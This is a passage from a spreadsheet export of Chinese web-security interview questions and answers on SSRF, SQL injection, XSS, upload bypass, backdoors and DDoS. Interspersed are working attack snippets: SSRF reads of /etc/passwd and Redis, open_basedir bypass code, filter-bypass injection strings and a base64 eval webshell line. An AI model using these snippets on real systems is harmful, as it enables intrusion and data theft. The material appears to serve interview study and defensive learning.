代理跨域请求（CDN）
Html5 postMessage 方法
修改 document.domain 跨子域（可跨同级域或父域）
基于 Html5 websocket 协议</t>
  </si>
  <si>
    <t>jsonp 跨域和 CORS 跨域的区别？（严格说这两种都属于 CSRF 漏洞）</t>
  </si>
  <si>
    <t>jsonp 是 jquery 提供的跨域方式
cors 是 w3c 提供的一个跨域标准
——————————————————————
jsonp 只支持 get 方式的跨域
cors 支持 get 和 post 方式的跨域
——————————————————————
jsonp 支持所有的浏览器（因为所有浏览器都可以使用 script 标签发送请求）
cors 不支持 IE10 以下的浏览器</t>
  </si>
  <si>
    <t>SSRF 漏洞利用</t>
  </si>
  <si>
    <t>本地：
文件读取：file:///etc/passwd
使用 dict 协议获取 Redis 配置信息：dict://127.0.0.1:6379/info
使用 gopher 协议一键反弹 Redis（未授权访问） shell fastcgi
攻击内网中比较脆弱的服务：Redis、数据库、fastcgi 等
远程：
读文件发送到远程服务器
跳板</t>
  </si>
  <si>
    <t>DNS 外带可以用在那些漏洞？</t>
  </si>
  <si>
    <t>sql
盲 XXE 和 SSRF
XSS 无回显
命令执行无回显</t>
  </si>
  <si>
    <t>数据库种类？</t>
  </si>
  <si>
    <t>关系型数据库（SQL）：MySql、Oracle、MSSQL、Access、Sqlite、postgersql
非关系型数据库（NO SQL）:mongodb、Redis
Xml 文件：Xpath 注入</t>
  </si>
  <si>
    <t>SQL 和 NoSQL 的区别？</t>
  </si>
  <si>
    <t>SQL 优点：结构稳定、逻辑性强、易于理解
SQL 缺点：不适于高并发、不适于海量数据高效读写、维护开销大、相对 nosql 速度慢
NoSql 优点：易扩展、数据结构灵活、查询速度快
比较：没有好坏之分，只看应用环境。关系型数据库可靠性更强、适用于银行等数据精
度要求高的环境。非关系型数据库适用于高并发、大量数据库交互、数据准确度不高的
环境。</t>
  </si>
  <si>
    <t>文件上传绕过？</t>
  </si>
  <si>
    <t>轻量级检测绕过
a.绕过前端 JavaScript 检测：使用 Burp 抓包改包。
b.绕过服务器端 MIME 类型检测：使用 Burp 抓包改包。
路径/文件扩展名检测绕过
a.黑名单检测方式
大小写、扩展名（php4）
特殊文件名绕过；
0x00 截断绕过；
.htaccess 文件攻击（windows 流）
b.白名单检测方式
截断绕过
Content-Disposition: form-data; Content-Type: application/octet-stream
这两项 加减空格 变换大小写 字符串拼接（form-data-&gt;form-da+ta）
双文件上传
上传木马时，提示格式错误 直接抓包修改 Content-Type 为正确的格式尝试绕过
文件内容检测：
1、正常图片末尾添加一句话木马
2、二次渲染
3、文件头检测
PNG 的文件头为十六进制的 89 50 4E 47 0D 0A 1A 0A
GIF 为 47 49 46 38 37 61 GIF89a
JPG 为 FF D8 FF E0
文件编辑器上传：FCKEditor、Ewebeditor、UEditor、KindEditor、XHditor</t>
  </si>
  <si>
    <t>open_basedir 访问目录限制绕过方法？</t>
  </si>
  <si>
    <t>利用命令执行函数 bypass（system(‘cat /etc/passwd’）;
推特最新 Bypass(chair()函数改变工作目录）
mkdir(“/tmp/fuck”);
chdir(‘/tmp/fuck/‘);
ini_set(‘open_basedir’,’..’);
chdir(‘..’);
chdir(‘..’);
chdir(‘..’);
chdir(‘..’);
ini_set(‘open_basedir’,’/‘);
var_dump(file_get_contents(“/etc/passwd”));
glob 伪协议
&lt;?php
$a = “glob:///var/www/test/.txt”;
if ( $b = opendir($a) ) {
while ( ($file = readdir($b)) !== false ) {
echo “filename:”.$file.”\n”;
}
closedir($b);
}
?&gt;</t>
  </si>
  <si>
    <t>php 爆绝对路径方法？</t>
  </si>
  <si>
    <t>单引号爆路径
错误参数值爆路径
www.xxx.com/researcharchive.php?id=-1
Google 爆路径
Site:xxx.edu.tw warning
测试文件爆路径（test.php、1.php、ceshi.php、info.php）
phpmyadmin 爆路径
/phpmyadmin/libraries/lect_lang.lib.php
配置文件找路径</t>
  </si>
  <si>
    <t>常见后门方式？</t>
  </si>
  <si>
    <t>windows：
1.替换系统文件类(shift 后门,放大镜后门)
2.修改注册表类
自启动项、屏幕保护程序注册表、用户登陆初始化、映像劫持、影子账户、文件关联
3.文件类
自启动文件夹、office 启动劫持
4.计划任务 schtasks 、WMI、bitsadmin
Linux
1.预加载型动态链接库后门
2.SSH 后门
3.SUID 后门
4.vim 后门
5.PAM 后门
6.进程注入
7.Rootkit
8.端口复用</t>
  </si>
  <si>
    <t>发现 IIS 的网站，怎样试它的漏洞？（根据版本）</t>
  </si>
  <si>
    <t>1、IIS5.0/6.0/7.5 解析漏洞
2、IIS7.5 NET 源代码泄露和身份验证漏洞
3、IIS7.5ASP 验证绕过
4、IIS 6.0 安装 PHP 绕过认证漏洞/IIS PUT (webDAV)这应该算是一个配置漏洞吧</t>
  </si>
  <si>
    <t>如果存在 SQL 注入怎么判断不同的数据库？</t>
  </si>
  <si>
    <t>(1)注释符判断
/是 MySQL 中的注释符，返回错误说明该注入点不是 MySQL；
继续提交如下查询字符：–是 Oracle 和 MSSQL 支持的注释符，如果返回正常，则说
明为这两种数据库类型之一。
继续提交如下查询字符：;是子句查询标识符，Oracle 不支持多行查询，因此如果返回
错误，则说明很可能是 Oracle 数据库。
(2)函数判断
and (select count()from MSysAccessObjects)&gt;0 access 数据库
and (select count()from sysobjects)&gt;0 返回正常说明是 mssql 数据库
and length(user())&gt;10 返回正常说明是 Mysql
Oracle 可以根据 from dual 虚拟库判断
(3)根据语言和中间件常识
Asp 和.net 通常使用 sqlserver
Php 通常使用 mysql 或者 postgresql
Java 通常是 oracle 或 mysql
IIS 服务器是基于 windows 的架构，后台数据库有可能是 sqlserver
Apache 服务器，可能使用开源数据库 mysql 或 postgresql</t>
  </si>
  <si>
    <t>鱼叉式攻击和水坑攻击？</t>
  </si>
  <si>
    <t>鱼叉式钓鱼攻击一般通过电子邮件等电子通信方式进行，针对特定个人、组织或企业，
窃取的资料信息更敏感更有价值。主要通过诱使点击恶意连接或者输入账号密码获取信
息。
水坑攻击算是鱼叉攻击的延伸：
攻击者定期观察受害者或特定团体经常访问的网站，然后用恶意软件感染这些网站。
然后寻找这些网站的漏洞，并将恶意编程代码(通常以 JavaScript 或 HTML 形式)注入到
网站上显示的广告或横幅上。
然后恶意代码会将受害者重定向到存在恶意软件或恶意广告的网络钓鱼网站上。
当受害者访问这些网站时，受害者的计算机就会自动下载包含恶意软件的脚本。
然后恶意软件会收集受害者的个人信息，并将其发送给攻击者操作的 C&amp;C 服务器。
其他的钓鱼方式：
钓鱼 WiFi、伪基站、钓鱼二维码、U 盘钓鱼</t>
  </si>
  <si>
    <t>中间件漏洞总结？</t>
  </si>
  <si>
    <t>（一） IIS
1、PUT 漏洞
2、短文件名猜解
3、远程代码执行
4、解析漏洞
（二） Apache
1、解析漏洞
2、目录遍历
（三） Nginx
1、文件解析
2、目录遍历
3、CRLF 注入
4、目录穿越
（四）Tomcat
1、远程代码执行
2、war 后门文件部署
（五）jBoss
1、反序列化漏洞
2、war 后门文件部署
（六）WebLogic
1、反序列化漏洞
2、SSRF
3、任意文件上传
4、war 后门文件部署
（七）其它中间件相关漏洞
1、FastCGI 未授权访问、任意命令执行
2、PHPCGI 远程代码执行</t>
  </si>
  <si>
    <t>XSS？（XSS 的根源主要是代码层没有对输入输出做好过滤）</t>
  </si>
  <si>
    <t>反射性 XSS 都是把恶意数据传入服务器，不过滤再回传浏览器造成的；
DOM 型 XSS 主要是通过改变浏览器页面的 DOM 节点形成的，可能不会经过服务器
（PHP_SELF）
存储型 XSS 主要是从数据库里取出来输出到浏览器时没有做实体化编码过滤。
XSS 蠕虫的产生条件：（不一定需要存储型 XSS）
一个是产生 XSS 点的页面不属于 self 页面
用户之间产生交互行为的页面
XSS 防护
处理输出编码,js 转译.实体化编码
黑白名单过滤(编码限制,标签限制,符号限制)
跨域限制
CSP 内容安全策略（浏览器前端防护策略） 的实质就是白名单制度，开发者明确告诉
客户端，哪些外部资源可以加载和执行，等同于提供白名单。将同源同域发挥到极致。
它的实现和执行全部由浏览器完成，开发者只需提供配置。CSP 大大增强了网页的安全
性。攻击者即使发现了漏洞，也没法注入脚本，除非还控制了一台列入了白名单的可信
主机。主要防止 XSS 漏洞，但是不能杜绝 XSS。
绕过：
Html5 新标签属性
JavaScript 伪协议
编码混淆</t>
  </si>
  <si>
    <t>中间人攻击（Burp 抓包原理）？</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">中间人攻击是一个（缺乏）相互认证的攻击；由于客户端与服务器之间在 SSL 握手的过
程中缺乏相互认证而造成的漏洞 （攻击方式 SSLSniff、SSLStrip）
防御中间人攻击的方案通常基于以下几种技术：
1.公钥基础建设 PKI 使用 PKI 相互认证机制。
2.延迟测试
使用复杂加密哈希函数进行计算以造成数十秒的延迟；如果双方通常情况下都要花费
20 秒来计算，并且整个通讯花费了 60 秒计算才到达对方，这就能表明存在第三方中间
人。
3.使用其他形式的密钥交换形式
ARP 欺骗：
原理:
每台主机都有一个 ARP 缓存表，缓存表中记录了 IP 地址与 MAC 地址的对应关系，而
局域网数据传输依靠的是 MAC 地址。在 ARP 缓存表机制存在一个缺陷，就是当请求主
机收到 ARP 应答包后，不会去验证自己是否向对方主机发送过 ARP 请求包，就直接把
这个返回包中的 IP 地址与 MAC 地址的对应关系保存进 ARP 缓存表中，如果原有相同
IP 对应关系，原有的则会被替换。这样攻击者就有了偷听主机传输的数据的可能
防护
1.在主机绑定网关 MAC 与 IP 地址为静态（默认为动态），命令：arp -s 网关 IP 网关
MAC
2.在网关绑定主机 MAC 与 IP 地址
3.使用 ARP 防火墙
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>https抓包原理
https://www.cnblogs.com/Gouwa/p/12889377.html</t>
    </r>
  </si>
  <si>
    <t>数据库存储引擎？</t>
  </si>
  <si>
    <t>数据库体系结构由客户端连接层、数据库服务层及存储引擎层组成。
存储引擎是数据库中具体与文件打交道的子系统，存储引擎底部是物理存储层，是文件
的物理存储层，包括二进制日志、数据文件、错误日志、慢查询日志、全日志等。
不同的存储引擎提供不同的存储机制、索引技巧、锁定水平等功能
InnoDB：主流的存储引擎。（MySQL）
MyISAM：访问速度快，不支持事务，逐渐被淘汰
MEMORY：BTREE 索引或者 HASH 索引。</t>
  </si>
  <si>
    <t>https 的建立过程、TCP 三次握手四次挥手过程、OSI 四层网络模型及其各层协议、
还有个七层模型？</t>
  </si>
  <si>
    <t>https连接
https://www.cnblogs.com/liyuhui-Z/p/7844880.html
TCP握手/挥手
https://blog.csdn.net/zy010101/article/details/90452199
OSI七层与之后的TCP/ip四层
https://www.cnblogs.com/Robin-YB/p/6668762.html</t>
  </si>
  <si>
    <t>PHP 代码审计中容易出问题的点？</t>
  </si>
  <si>
    <t>详见：
https://github.com/bowu678/php_bugs
https://github.com/hongriSec/PHP-Audit-Labs
1、弱类型（比较、字符类型转换）
intval 函数四舍五入（小数取整绕过）
intval 函数转换字符串
if($a&gt;1000){
mysql_query(‘update … …. set value=$a’)
} //$a 一定是整数。然而，你输入 1002/*/union 也能进入这个语句
数组转字符串
Array 转换整型 int/浮点型会返回元素个数；
Array 转换 bool 返回 Array 中是否有元素；
Array 转换成 string 返回 Array，并抛出 warning。
MD5()函数===使用数组绕过 ?username[]=1&amp;password[]=2 数组 hash 之后都是 null
MD5()函数==,使用 md5 碰撞 ?username=s878926199a&amp;password=s155964671a hash
碰撞+弱类型
2、函数缺陷
Strcmp()函数 无法比较数组，比较时报错并返回 0 PHP5.3 之前版本
ereg 正则%00 截断 16.php?nctf=1%00%23biubiubiu 支持 5.3 之前版本的 php 之后使用
preg_match()函数替代（也有绕过分析）
strpos 出错返回的也是 null 原来是判断字符串，我们传入一个数组返回值就是 null null！
=false
序列化：将 php 中对象、类、数组、变量、匿名函数等，转化为字符串 方便保存到数
据库或者文件中（将状态信息保存为字符串）
unserialize()反序列化参数可控
iconv 在字符编码转换时可能导致字符串截断。上传的文件名为 shell.php{%80-%99}.jpg
上传绕过
filter_var ( url，FILTER_VALIDATE_URL )使用 PHP 内置特定过滤器过滤 url
可能使用伪协议绕过，再次输出 url 时造成 XSS
?url=javascript://comment％250a alert(1)
foreach 语句滥用造成的变量覆盖
3、默认缺省参数缺陷
in_array（a,array,FALSE）函数 检查数组中是否存在某个值
第三个参数默认为 FALSE，若粗心的开发没有写第三个参数为 true 的话，比较过程只进
行弱类型检查，容易产生绕过
htmlentities(string,缺省参数） 将字符转换为 HTML 转义字符
三大缺省参数：
ENT_COMPAT（默认值）：只转换双引号。
ENT_QUOTES：两种引号都转换。
ENT_NOQUOTES：两种引号都不转换。
同样的若是开发人员不专心，没加缺省参数，造成单引号逃逸</t>
  </si>
  <si>
    <t>IP 伪造</t>
  </si>
  <si>
    <t>由于 TCP 需要三次握手连接，在实现正常的 TCP/IP 双方通信情况下，是无法伪造来源
IP 的，也就是说，在 TCP/IP 协议中，可以伪造数据包来源 IP ，但这会让发送出去的
数据包有去无回，无法实现正常的通信 但是一些 DDoS 攻击可以
后端 IP 获取来源
REMOTE_ADDR 是远端 IP，默认来自 tcp 连接客户端的 Ip。可以说，它最准确，确定是，
只会得到直接连服务器客户端 IP。如果对方通过代理服务器上网，就发现。获取到的是
代理服务器 IP 了。
HTTP_X_FORWARDED_FOR 为了能在大型网络中，获取到最原始用户 IP，或者代理 IP
地址。对 HTTp 协议进行扩展，定义的实体头。 后端处理若这种方法，可能会造成 XFF
注入和伪造 IP 绕过访问限制
X-Real-IP X-Forwarded-For 在无代理时可以理解为用户的 IP 地址，有反向代理时，先
将 REMOTE_ADDR 赋给 X-Real-IP，最后可以从 X-Real-IP 中获取用户的 IP。
CDN-Src-IP CDN 节点会以某种方式将源客户端的 IP 传递给源服务器</t>
  </si>
  <si>
    <t>sql 注入过滤了逗号，怎么弄?</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1、可以用 join
select id,ip from client_ip where 1&gt;2 union select from ((select user())a JOIN (select version())b);
2、可以用 from 1 for 1
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
3、offset
select * from news limit 0,1
等价于下面这条 SQL 语句
select * from yang limit 1 offset 0
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>case when then绕过
https://www.yisu.com/ask/2407.html</t>
    </r>
  </si>
  <si>
    <t>了解过 websocket 吗？</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">它的最大特点就是，服务器可以主动向客户端推送信息，客户端也可以主动向服务器发
送信息，是真正的双向平等对话，属于服务器推送技术的一种。
其他特点包括：
（1）建立在 TCP 协议之上，服务器端的实现比较容易。
（2）与 HTTP 协议有着良好的兼容性。
（3）数据格式比较轻量，性能开销小，通信高效。
（4）可以发送文本，也可以发送二进制数据。
（5）没有同源限制，客户端可以与任意服务器通信。
（6）协议标识符是 ws（如果加密，则为 wss），服务器网址就是 URL。
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>我见过最好的websocket介绍
https://blog.csdn.net/assassinsshadow/article/details/76915988?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&amp;dist_request_id=1328602.638.16148623289180489&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.control</t>
    </r>
  </si>
  <si>
    <t>DDOS 是什么？ 非正常的数据包(syn,flood)等</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">分布式拒绝服务攻击（DDoS）是目前黑客经常采用而难以防范的攻击手段。DoS 的攻
击方式有很多种，最基本的 DoS攻击就是利用合理的服务请求来占用过多的服务资源，
从而使合法用户无法得到服务的响应。
随着计算机与网络技术的发展，计算机的，内存大大处理能力迅速增长增加，可以缓解
DDoS 攻击。但是多台傀儡机同时发送也受不了。
CC 攻击
模拟多个正常用户不停地访问如论坛这些需要大量数据操作的页面，造成服务器资源的
浪费，CPU 长时间处于 100%，永远都有处理不完的请求，网络拥塞，正常访问被中止。
这种攻击技术性含量高，见不到真实源 IP，见不到特别大的异常流量。
CC 攻击与传统 DDoS 的不同
攻击对象不同：DDoS 针对 IP，CC 针对网页
流量大小不同：DDoS 需要的流量更大
危害不同：DDoS 危害大，CC 危害时间长
门槛不同：DDoS 需要大量傀儡机，CC 更容易利用
被攻击的服务器有以下症状
有大量等待的 TCP 连接；
网络中充斥着大量的无用的数据包，源地址为假；
网络拥塞，受害主机无法正常和外界通讯；
造成死机。
DDoS 防护
网络设备设施（加带宽、硬件防火墙、高性能设备）
负载均衡 CDN、分布式集群防御
流量清洗服务
限制特定流量、过滤不必要服务和端口
Syn 洪流
向服务器发送了 SYN 报文后突然死机或掉线，服务器第三次握手找不到客户端，会进
行重试，就是重试这个时间，一般是分钟级的
IP 欺骗 DOS 攻击
发假 IP，连接不成功，服务器清空缓存重连的时间空隙
UDP 洪水攻击
无用数据流占用带宽
Ping 洪流攻击（死亡之ping）
声称自己的数据包大于 64K，对方服务器看到这个声称后，内存分配错误，导致 TCP/IP
堆栈错误而死机
Land 攻击
特别打造的 SYN 包，它的原地址和目标地址都被设置成目标服务器地址。接受服务器
向它自己的地址发送 SYN-ACK 消息，结果这个地址又发回 ACK 消息并创建一个空连
接。被攻击的服务器每接收一个这样的连接都将保留，直到超时
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>ddos原理几防御
https://blog.csdn.net/qq_34777600/article/details/81946514</t>
    </r>
  </si>
  <si>
    <t>当你输入一个网址会发生什么？</t>
  </si>
  <si>
    <t>1）找域名对应 IP（找 dns、依次是浏览器缓存、系统缓存、路由器缓存、ISP 缓存、递
归搜索）
2）应用层-浏览器给 Web 服务器发送一个 Http 请求
3）传输层-HTTP 数据包会嵌入到 TCP 报文中
4）网络层-TCP 报文段嵌入 IP 数据包中
5）网络接口层-IP 数据包嵌入到帧中，在网络中传输
6）网关转发到达相关服务器，请求对应端口的服务
7）服务器返回一个 HTTP 响应
8）浏览器以相同的步骤，读取 HTTP 响应的内容，解析页面</t>
  </si>
  <si>
    <t>webshell 检测思路？</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">静态检测 匹配特征码
动态检测 cmd bash 等敏感应用异常启用
日志检测 HTTP 异常请求模型检测
语法检测 关键危险函数的捕捉
计划任务 防止后门
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文章：
https://paper.seebug.org/papers/old_sebug_paper/pst_WebZine/pst_WebZine_0x05/0x08_WebShell%E6%A3%80%E6%B5%8B%E6%80%9D%E8%B7%AF%E6%B5%85%E8%B0%88.html</t>
    </r>
  </si>
  <si>
    <t>GPC 是什么？开启了怎么绕过</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">php.ini 中的 magic_quotes_gpc，默认为 off，如何打开了，会实现 addslashes()和
stripslashes()的功能，对于从 GET，POST，COOKIE 输入的单引号、双引号、反斜线和
NULL 会加反斜线进行转义
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">魔术引号：
https://www.cnblogs.com/i-honey/p/7905953.html
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
绕过：
http 的请求头的内容是可以在$_SERVER 读取的，可将其作为传参变量
二次注入
编码解码绕过(UTF-7、GBK、二次编码等)
代码审计—单引号逃逸
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>$_SERVER 官方介绍
https://www.php.net/manual/zh/reserved.variables.server.php</t>
    </r>
  </si>
  <si>
    <t>web 常用的加密算法有什么</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">单向散列加密 MD5、SHA、MAC
对称加密 AES、DES
非对称加密 RSA、RSA2
前端加密 RSA、MD5、AES
对称加密：加、解密使用的同是一串密钥 效率高 不安全
非对称加密：加、解密使用不同的密钥，互相加解密 效率低 安全 https 就是这个 
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>HTTPS传输原理
https://www.cnblogs.com/xiohao/p/9054355.html</t>
    </r>
  </si>
  <si>
    <t>XSS 除了获取 cookies 还能干嘛？</t>
  </si>
  <si>
    <t>获取服务器真实 ip
xss 蠕虫
钓鱼攻击
前端 JS 挖矿
获取键盘记录</t>
  </si>
  <si>
    <t>网络安全事件应急响应</t>
  </si>
  <si>
    <t>取证，登录服务器
备份，检查服务器敏感目录
查毒（搜索后门文件 - 注意文件的时间，用户，后缀等属性），调取日志（系统日志，
中间件日志，WAF 日 志等）；
处理，恢复备份（快照回滚，最近一次），确定入侵方法（漏洞检测，并进行修复）
溯源，查入侵 IP，入侵手法（网路攻击事件）的确定等
记录，归档—-预防-事件检测-抑制-根除-恢复-跟踪-记录
通用漏洞的应对等其他安全应急事件</t>
  </si>
  <si>
    <t>HTML5 新的安全特性</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">iframe 沙箱 默认除了显示静态页面以外，不准提交表单、不准弹窗、不准执行脚本
CSP 内容安全策略
Flash 加载取消  
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>介绍</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>https://www.cnblogs.com/Qiuzhiyu/p/13280257.html</t>
    </r>
  </si>
  <si>
    <t>病毒，木马，蠕虫的区别？</t>
  </si>
  <si>
    <t>病毒是编制者在计算机程序中插入的破坏计算机功能或者数据的代码。
木马是指通过特定的程序来控制另一台计算机。（一句话木马）
蠕虫是一种能够利用系统漏洞通过网络进行自我传播的恶意程序。（XSS 蠕虫）
病毒、蠕虫的共同特征是自我复制、传播、破坏电脑文件。
木马伪装、潜伏在电脑中、窃取资料、远程操控。</t>
  </si>
  <si>
    <t>对于云安全的理解？</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">权限管理，内网威胁，信息泄露，过于依赖托管厂商
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF417FF9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
介绍
https://www.cnblogs.com/ffx1/p/13200255.html</t>
    </r>
  </si>
  <si>
    <t>防止 XSS，前端后端两个角度？</t>
  </si>
  <si>
    <t xml:space="preserve">尽量不要使用直接拼接 HTML 的方法，如果框架允许，使用 createElement 之
类的方法实现。或者采用比较成熟的渲染框架，如 Vue
CSP 策略
后端：实体化编码、长度截取、过滤 
https://segmentfault.com/a/1190000007766732
</t>
  </si>
  <si>
    <t>虚拟机逃逸</t>
  </si>
  <si>
    <t>虚拟机逃逸指的是突破虚拟机的限制，实现与宿主机操作系统交互的一个过程，攻击者
可以通过虚拟机逃逸感染宿主机或者在宿主机上运行恶意软件.</t>
  </si>
  <si>
    <t>如何防范羊毛党？</t>
  </si>
  <si>
    <t>相应的活动门槛和限制（什么用户、次数）
对于有猫池、卡池的采用封 IP、封用户、增加验证码、身份核验</t>
  </si>
  <si>
    <t>Mysql 一个@和两个@什么区别</t>
  </si>
  <si>
    <t>一个@是 用户自定义的变量
两个@是 globa（全局变量）l 或 session 变量</t>
  </si>
  <si>
    <t>webshell 已经上传如何禁止菜刀等工具连接</t>
  </si>
  <si>
    <t>安全狗拦截、扫描木马删除、可以流量分析（蚁剑、冰蝎流量免杀）
绕过防护：改超全局变量法、改连接函数法@eval(base64_decode($_POST[action]));</t>
  </si>
  <si>
    <t>一个互联网网站端口如何防护，发现入侵如何解决？</t>
  </si>
  <si>
    <t>如何防护：防火墙、WAF、IPS（入侵防御系统）、IDS（入侵检测系统）
如何解决：关闭危险服务如 SMB、RDP、数据库端口不对外网访问 封禁 ip，查看日志。</t>
  </si>
  <si>
    <t>NAT 的两种模式</t>
  </si>
  <si>
    <t xml:space="preserve">    SNAT： 源网络地址转换；
    原理：修改数据包的源地址。源 NAT 改变第一个数据包的来源地址，它永远会在数据包发送到网络之前完成，数据包伪装就是一具 SNAT 的例子。将内网发出的请求报文原地址转换成自己的地址发往远端服务器，对回来的响应报文在作做反向处理，类似网络代理。
    DNAT：目的网络地址转换；
    原理：修改数据包的目的地址。Destination NAT 刚好与 SNAT 相反，它是改变第一个数据包的目的地地址，如负载、端口转发和透明代理就是属于 DNAT。将内网服务端口映射在公网出口地址上。NAT 不仅能解决了 lP 地址不足的问题，而且还能够有效地避免来自网络外部的攻击，隐藏并保护网络内部的计算机。</t>
  </si>
  <si>
    <t>--</t>
  </si>
  <si>
    <t>企业内部安全</t>
  </si>
  <si>
    <t xml:space="preserve">    信息安全管理的本质就是输入和输出。一般防范的风险为物理威胁和网络威胁。
防范风险可以从制度和流程（人员入离职流程、权限申请流程）、人员配备和知识积累、风险防范
    物理威胁：门禁、监控、禁止 USB 设备接入、封闭 PC、定时巡检
    网络威胁：部署行为管控设备、可靠的网络结构、IP 和 MAC 地址绑定，将网络行为分
组、限制不必要的软件和通信协议、定期审核日志。</t>
  </si>
  <si>
    <t>eval 和 system 的区别？</t>
  </si>
  <si>
    <t xml:space="preserve">    eval 类型函数是代码执行
    system 类型函数是命令执行
eval 函数里必须是一个符合 php 语法的语句，如果语句结尾没有分号会报错
                                                                                                                           &lt;?php
    eval("echo 1+1;");    //2
    system("echo 1+1;");  //1+1;
?&gt; 
                                                                                                                                                                                                                                                                                     &lt;?php
system(“whoami”); //whoami 命令被执行
eval(“whoami”); //whoami 命令不被执行
?&gt;
                                                                                                                             &lt;?php
eval(“phpinfo();”); //phpinfo()被执行
system(“phpinfo()”); //phpinfo()不被执行
?&gt;                                                                                                                                    
                                                                                                                        &lt;?php
$num=1;
eval(“\$a = $num;”); //有效,$a=1
system(“\$b = $num;”); //无效,$b=NULL
?&gt;
                                                                                                                                   代码执行函数：eval、assert、call_user_func、create_function、array_map
命令执行函数：system、passthru、exec、pcntl_exec、shell_exec、popen()、``</t>
  </si>
  <si>
    <t>python 黑科技之迭代器、生成器、装饰器</t>
  </si>
  <si>
    <t xml:space="preserve">                  （不确定）   来源： https://www.cnblogs.com/xiaocheche/p/7627128.html
  迭代器：是一种访问集合元素的一种方式，迭代器对象从集合的第一个元素开始访问，直到所有的元素被访问完结束；迭代器只能往前不会后退；迭代器的一大优点是不要求事先准备好整个迭代过程中所有的元素；迭代器仅仅在迭代到某个元素时才计算该元素，而在这之前或之后元素可以不存在或被销毁。 可迭代对象 list、set 和 dict 
   生成器：一个函数调用时返回一个迭代器，那这个函数就叫做生成器，如果函数中包含yield语法，那这个函数就会变成生成器；
　　yield的主要作用：可以使函数中断，并保存中断状态，中断后代码可以继续往下执行，过一段时间还可以再重新调用这个函数，从上次yield的下一句开始执行；              
    装饰器：不改变原来函数功能的基础上增加其他功能，给已经实现的功能扩展新的功能。</t>
  </si>
  <si>
    <t>缓冲区溢出原理和防御</t>
  </si>
  <si>
    <t xml:space="preserve">   缓冲区是内存中存放数据的地方，通过往程序的缓冲区，写入超出其长度的内容，造成缓冲区的溢出，这时可能会出现两个结果：一是过长的字符串覆盖了相邻的存储单元，引起程序运行失败，严重的可导致系统崩溃；另一个结果就是利用这种漏洞可以执行任意指令，甚至可以取得系统root特级权限。造成“缓冲区溢出”的原因是，程序中没有仔细检查用户输入的参数。
   防御：1、强制写正确的代码的方法；
